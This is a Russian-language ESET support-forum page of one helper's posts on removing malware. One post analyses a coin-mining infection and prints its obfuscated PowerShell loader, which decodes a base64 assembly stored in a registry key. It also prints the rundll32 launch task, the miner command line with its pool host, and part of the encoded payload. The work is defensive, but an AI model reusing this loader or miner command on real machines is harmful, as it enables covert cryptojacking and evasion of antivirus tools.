santy (Все сообщения пользователя) - Форум технической поддержки ESET NOD32

[ Закрыто] Ошибка MS 1303 вызвана вредоносными программами. Помогите!, Не могу установить антивирус

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 10.03.2020 11:44:35

в данном случае, когда остались только хвосты от майнера, а в образе автозапуска практически нет информации о нем после предварительной зачистки вирусни,
больше пользы было от логов FRST
а именно:

Цитата
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Users\Все пользователи\Norton 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Users\Все пользователи\McAfee 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Users\Все пользователи\Kaspersky Lab Setup Files 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Users\Все пользователи\Kaspersky Lab 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Users\Все пользователи\grizzly 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Users\Все пользователи\ESET 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Users\Все пользователи\360safe 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\ProgramData\RunDLL 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\ProgramData\Norton 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\ProgramData\McAfee 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\ProgramData\Kaspersky Lab Setup Files 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\ProgramData\Kaspersky Lab 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\ProgramData\grizzly 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\ProgramData\ESET 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\ProgramData\360safe 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files\Kaspersky Lab 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files\ESET 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files\COMODO 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files\Common Files\McAfee 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files\Cezurity 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files\ByteFence 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files\AVG 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files (x86)\Panda Security 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files (x86)\Microsoft JDX 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files (x86)\Kaspersky Lab 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files (x86)\GRIZZLY Antivirus 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files (x86)\Cezurity 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files (x86)\AVG 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files (x86)\AVAST Software 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files (x86)\360 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\KVRT_Data

Цитата

2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Users\Все пользователи\Norton
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Users\Все пользователи\McAfee
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Users\Все пользователи\Kaspersky Lab Setup Files
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Users\Все пользователи\Kaspersky Lab
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Users\Все пользователи\grizzly
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Users\Все пользователи\ESET
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Users\Все пользователи\360safe
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\ProgramData\RunDLL
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\ProgramData\Norton
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\ProgramData\McAfee
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\ProgramData\Kaspersky Lab Setup Files
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\ProgramData\Kaspersky Lab
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\ProgramData\grizzly
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\ProgramData\ESET
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\ProgramData\360safe
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files\Kaspersky Lab
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files\ESET
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files\COMODO
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files\Common Files\McAfee
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files\Cezurity
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files\ByteFence
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files\AVG
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files (x86)\Panda Security
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files (x86)\Microsoft JDX
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files (x86)\Kaspersky Lab
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files (x86)\GRIZZLY Antivirus
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files (x86)\Cezurity
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files (x86)\AVG
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files (x86)\AVAST Software
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files (x86)\360
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\KVRT_Data

что можно интерпретировать как
пустые каталоги, без файлов, с атрибутами SH
R - Атрибут "Только чтение".
A - Атрибут "Архивный".
S - Атрибут "Системный".
H - Атрибут "Скрытый".

[ Как создать образ автозапуска? ]

Перейти

[ Закрыто] Ошибка MS 1303 вызвана вредоносными программами. Помогите!, Не могу установить антивирус

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 09.03.2020 19:53:38

Есть у вас предположение, откуда возникло заражение в системе?

[ Как создать образ автозапуска? ]

Перейти

[ Закрыто] Ошибка MS 1303 вызвана вредоносными программами. Помогите!, Не могу установить антивирус

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 09.03.2020 19:41:06

Не с этой ли программой прилетел вам майнер?
NitroSense Service
Есть у вас предположение, откуда возникло заражение в системе?

[ Как создать образ автозапуска? ]

Перейти

[ Закрыто] Ошибка MS 1303 вызвана вредоносными программами. Помогите!, Не могу установить антивирус

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 09.03.2020 14:02:52

хорошо,
возможно установщик ESET находил каталоги с установленными ранее антивирусами, и прекращал установку

[ Как создать образ автозапуска? ]

Перейти

[ Закрыто] Ошибка MS 1303 вызвана вредоносными программами. Помогите!, Не могу установить антивирус

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 09.03.2020 13:44:07

+ этот скрипт выполните в FRST
Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!

Код
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION 2020-03-08 17:46 - 2020-03-08 17:46 - 000000000 ____D C:\Users\john\AppData\Roaming\AVAST Software 2020-03-08 16:34 - 2020-03-08 22:42 - 000000000 __SHD C:\Users\Все пользователи\Doctor Web 2020-03-08 16:34 - 2020-03-08 22:42 - 000000000 __SHD C:\ProgramData\Doctor Web 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Users\Все пользователи\Norton 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Users\Все пользователи\McAfee 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Users\Все пользователи\Kaspersky Lab Setup Files 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Users\Все пользователи\Kaspersky Lab 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Users\Все пользователи\grizzly 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Users\Все пользователи\ESET 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Users\Все пользователи\360safe 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\ProgramData\Norton 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\ProgramData\McAfee 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\ProgramData\Kaspersky Lab Setup Files 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\ProgramData\Kaspersky Lab 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\ProgramData\grizzly 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\ProgramData\ESET 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\ProgramData\360safe 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files\Kaspersky Lab 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files\ESET 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files\COMODO 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files\Common Files\McAfee 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files\Cezurity 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files\AVG 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files (x86)\Panda Security 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files (x86)\Microsoft JDX 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files (x86)\Kaspersky Lab 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files (x86)\GRIZZLY Antivirus 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files (x86)\Cezurity 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files (x86)\AVG 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files (x86)\AVAST Software 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files (x86)\360 2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\KVRT_Data EmptyTemp: Reboot:

Код

HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
2020-03-08 17:46 - 2020-03-08 17:46 - 000000000 ____D C:\Users\john\AppData\Roaming\AVAST Software
2020-03-08 16:34 - 2020-03-08 22:42 - 000000000 __SHD C:\Users\Все пользователи\Doctor Web
2020-03-08 16:34 - 2020-03-08 22:42 - 000000000 __SHD C:\ProgramData\Doctor Web
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Users\Все пользователи\Norton
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Users\Все пользователи\McAfee
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Users\Все пользователи\Kaspersky Lab Setup Files
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Users\Все пользователи\Kaspersky Lab
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Users\Все пользователи\grizzly
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Users\Все пользователи\ESET
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Users\Все пользователи\360safe
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\ProgramData\Norton
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\ProgramData\McAfee
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\ProgramData\Kaspersky Lab Setup Files
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\ProgramData\Kaspersky Lab
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\ProgramData\grizzly
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\ProgramData\ESET
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\ProgramData\360safe
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files\Kaspersky Lab
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files\ESET
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files\COMODO
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files\Common Files\McAfee
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files\Cezurity
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files\AVG
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files (x86)\Panda Security
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files (x86)\Microsoft JDX
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files (x86)\Kaspersky Lab
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files (x86)\GRIZZLY Antivirus
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files (x86)\Cezurity
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files (x86)\AVG
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files (x86)\AVAST Software
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\Program Files (x86)\360
2020-03-08 16:34 - 2020-03-08 16:34 - 000000000 __SHD C:\KVRT_Data
EmptyTemp:
Reboot:

[ Как создать образ автозапуска? ]

Перейти

[ Закрыто] Ошибка MS 1303 вызвана вредоносными программами. Помогите!, Не могу установить антивирус

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 09.03.2020 13:36:41

надо раскрыть ветку Software, чтобы убедиться есть там папка WinSys32 или нет.

[ Как создать образ автозапуска? ]

Перейти

[ Закрыто] Ошибка MS 1303 вызвана вредоносными программами. Помогите!, Не могу установить антивирус

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 09.03.2020 13:04:20

проверьте, есть у вас в системе такой ключ
[HKEY_CURRENT_USER\Software\WinSys32],
если есть, сделайте экспорт ключа в файл, и добавьте на форум

[ Как создать образ автозапуска? ]

Перейти

поговорить о uVS, Carberp, планете Земля

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 07.03.2020 18:59:02

по активным сейчас темам Trojan.Multi.GenAutorunProc.a на некоторых форумах что можно сказать.

симптомы, пример:

Цитата
заметил, что моя любимая игрушка начала тормозить, включил msi afterburner с выводом информации про загрузку и температуру процессора на экран, загрузка достигала 50-100% на всех 8 ядрах. Решил открыть диспетчер задач, он показал что процессор загружен на 10-15%, не закрывая диспетчер задач зашел в игру, мси афтербернер показал 10-15%, игра перестала тормозить, закрыл диспетчер задач и игра снова стала тормозить. Я скачал прогу system explorer и она показала запущенный процесс notepad.exe, который потребляет 37,5% процессора. при открытии снова диспетчера задач, notepad.exe скрылся из запущенных процессов в system explorer, после закрытия диспетчера задач, notepad.exe снова запустился.

Цитата

заметил, что моя любимая игрушка начала тормозить, включил msi afterburner с выводом информации про загрузку и температуру процессора на экран, загрузка достигала 50-100% на всех 8 ядрах. Решил открыть диспетчер задач, он показал что процессор загружен на 10-15%, не закрывая диспетчер задач зашел в игру, мси афтербернер показал 10-15%, игра перестала тормозить, закрыл диспетчер задач и игра снова стала тормозить. Я скачал прогу system explorer и она показала запущенный процесс notepad.exe, который потребляет 37,5% процессора. при открытии снова диспетчера задач, notepad.exe скрылся из запущенных процессов в system explorer, после закрытия диспетчера задач, notepad.exe снова запустился.

довольно интересная картина происходит, которая может быть скрыта за текстовыми логами.

есть свежая задача Win32Utilities, из которой запущена dll
C:\Users\Pro\AppData\Roaming\WindowsShell\WindowsDiagnostics.dll
6,00 кб, rsAh, создан: 03.03.2020 19:11:07, изменен: 03.03.2020 19:39:19
следующим образом:
rundll32.exe C:\Users\Pro\AppData\Roaming\WindowsShell\WindowsDiagnostics.dll,Task
и все.

что мы видим в образе автозапуска:
во первых обнаружены потоки внедренные в процесс notepad.exe
(!) ПРЕДУПРЕЖДЕНИЕ: Обнаружен внедренный поток в процессе C:\WINDOWS\SYSTEM32\NOTEPAD.EXE [1860], tid=9912
во вторых, видим процесс, связанный так или иначе с запуском notepad.exe, явно связанный с майнером

Цитата
notepad.exe -o playgrounddonate.sytes.net:5555 -u NoFile -p x --randomx-mode=light --threads=4 -k --nicehash --donate-level=0

а так же видим процессы связанные с запуском powershell

Цитата
"powershell" -ExecutionPolicy Bypass -NoExit -NoProfile -Command $s = (Get-ItemProperty HKCU:\Software\WinSys32\).win;$r = $s.replace('.', '2').replace('(', '3').replace('-', '1'); $b = [System.Convert]::FromBase64String($r);[System.Reflection.Assembly]::Load($b);[GAS.Ad]::CU();Exit(0);

судя по командной строке, часть командной строки формируется из ключа HKCU:\Software\WinSys32, можно предположить, что значение ключа закодировано в base64

каким образом запущены процессы с участием powershell?
а вот отсюда, часть содержимого windowsdiagnostic.dll:

Цитата
Maindir Task a p p d a t a \ W i n d o w s S h e l l p o w e r s h e l l ‚%- E x e c u t i o n P o l i c y B y p a s s - N o E x i t - N o P r o f i l e - C o m m a n d $ s = ( G e t - I t e m P r o p e r t y H K C U : \ S o f t w a r e \ W i n S y s 3 2 \ ) . w i n ; $ r = $ s . r e p l a c e ( ' . ' , ' 2 ' ) . r e p l a c e ( ' ( ' , ' 3 ' ) . r e p l a c e ( ' - ' , ' 1 ' ) ; $ b = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ r ) ; [ S y s t e m . R e f l e c t i o n . A s s e m b l y ] : : L o a d ( $ b ) ; [ G A S . A d ] : : C U ( ) ; E x i t ( 0 )

Цитата

Maindir Task a p p d a t a \ W i n d o w s S h e l l p o w e r s h e l l ‚%- E x e c u t i o n P o l i c y B y p a s s - N o E x i t - N o P r o f i l e - C o m m a n d $ s = ( G e t - I t e m P r o p e r t y H K C U : \ S o f t w a r e \ W i n S y s 3 2 \ ) . w i n ; $ r = $ s . r e p l a c e ( ' . ' , ' 2 ' ) . r e p l a c e ( ' ( ' , ' 3 ' ) . r e p l a c e ( ' - ' , ' 1 ' ) ; $ b = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ r ) ; [ S y s t e m . R e f l e c t i o n . A s s e m b l y ] : : L o a d ( $ b ) ; [ G A S . A d ] : : C U ( ) ; E x i t ( 0 )

какая связь между процессом powershell и notepad?

а вот и явная связь.

по образу видим, что pid=8960 соответствует cmdline:

Цитата
"powershell" -ExecutionPolicy Bypass -NoExit -NoProfile -Command $s = (Get-ItemProperty HKCU:\Software\WinSys32\).win;$r = $s.replace('.', '2').replace('(', '3').replace('-', '1'); $b = [System.Convert]::FromBase64String($r);[System.Reflection.Assembly]::Load($b);[GAS.Ad]::CU();Exit(0);

а в инфо по notepad видим, что pid=1860 созданный cmdline

Цитата
"notepad.exe -o playgrounddonate.sytes.net:5555 -u NoFile -p x --randomx-mode=light --threads=4 -k --nicehash --donate-level=0"

но родительский процесс для него parentid=8960

остается только найти значение ключа HKCU:\Software\WinSys32, чтобы убедиться, что в нем содержится base64 значение

действительно, ключ содержит base64 код

Цитата
Windows Registry Editor Version 5.00 [HKEY_CURRENT_USER\Software\WinSys32] "win"="TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG-vZGUuDQ0KJAAAAAAAAABQRQAAZIYDAJPF0tgAAAAAAAAAAPAALiALAgYAAPoAAAAIAAAAAAAAAAAAAAAgAAAAAEAAAAAAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAABgAQAABAAAAAAAAAMAQIUAABAAAAAAAAAQAAAAAAAAAAAQAAAAAAAAEAAAAAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAAAAAAABAAQAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAghgBABwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAggAABIAAAAAAAAAAAAAAAudGV4dAAAACT5AAAAIAAAAPoAAAAEAAAAAAAAAAAAAAAAAAAgAABgLnNkYXRhAAD-AQAAACABAAACAAAA/gAAAAAAAAAAAAAAAAAAQAAAwC5yc(JjAAAAAAQAAABAAQAABAAAAAABAAAAAAAAAAAAAAAAAEAAAEAucmVsb.MAAAwAAAAAYAEAAAIAAAAEAQAAAAAAAAAAAAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZAQAAAAAASAAAAAIABQBAoAAAqloAAAkAAAAAAAAA6voAABgdAAACGAEAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEzADAKYAAAABAAARKwkoUtEZORQWmiYWLfkXKAsAAAY6YwAAACYgBAAAADg.AAAAEgAoAgAABiYgBQAAADgkAAAAEgAGjAMAAAIoCAAABn0BAAAEOCoAAAAgBAAAAP4OAQD+DAEARQYAAAAQAAAAv////wAAAACt////EAAAACIAAAA4qP///yYgAwAAADjT////EgD+FQMAAAIgAQAAADjB////KAkAAA

Цитата

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\WinSys32]
"win"="TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG-vZGUuDQ0KJAAAAAAAAABQRQAAZIYDAJPF0tgAAAAAAAAAAPAALiALAgYAAPoAAAAIAAAAAAAAAAAAAAAgAAAAAEAAAAAAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAABgAQAABAAAAAAAAAMAQIUAABAAAAAAAAAQAAAAAAAAAAAQAAAAAAAAEAAAAAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAAAAAAABAAQAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAghgBABwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAggAABIAAAAAAAAAAAAAAAudGV4dAAAACT5AAAAIAAAAPoAAAAEAAAAAAAAAAAAAAAAAAAgAABgLnNkYXRhAAD-AQAAACABAAACAAAA/gAAAAAAAAAAAAAAAAAAQAAAwC5yc(JjAAAAAAQAAABAAQAABAAAAAABAAAAAAAAAAAAAAAAAEAAAEAucmVsb.MAAAwAAAAAYAEAAAIAAAAEAQAAAAAAAAAAAAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZAQAAAAAASAAAAAIABQBAoAAAqloAAAkAAAAAAAAA6voAABgdAAACGAEAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEzADAKYAAAABAAARKwkoUtEZORQWmiYWLfkXKAsAAAY6YwAAACYgBAAAADg.AAAAEgAoAgAABiYgBQAAADgkAAAAEgAGjAMAAAIoCAAABn0BAAAEOCoAAAAgBAAAAP4OAQD+DAEARQYAAAAQAAAAv////wAAAACt////EAAAACIAAAA4qP///yYgAwAAADjT////EgD+FQMAAAIgAQAAADjB////KAkAAA

после декодирования получаем бинарный файл

+
update:
теперь вирлаб детектирует его как майнер.
ESET-NOD32: A Variant Of MSIL/CoinMiner.BDW
https://www.virustotal.com/gui/file/bdca7dd1be0f230efd68cfb824b73a7bf0e326ed39147011b5f858370d9e2869/detection

[ Как создать образ автозапуска? ]

Перейти

[ Закрыто] Антивирус не позволяет увидеть компьютеры в локальной сети., NOD 32 Internet Security 13. 0. 24. 0 я не вижу компьютеры подключенные к локальной сети.

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 06.03.2020 18:41:44

добавьте подсети, которым вы доверяете

[ Как создать образ автозапуска? ]

Перейти

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 04.03.2020 17:13:36

возможно, вы при установке ESS указали, что ваш компьютер изолирован от внешней сети

[ Как создать образ автозапуска? ]

Перейти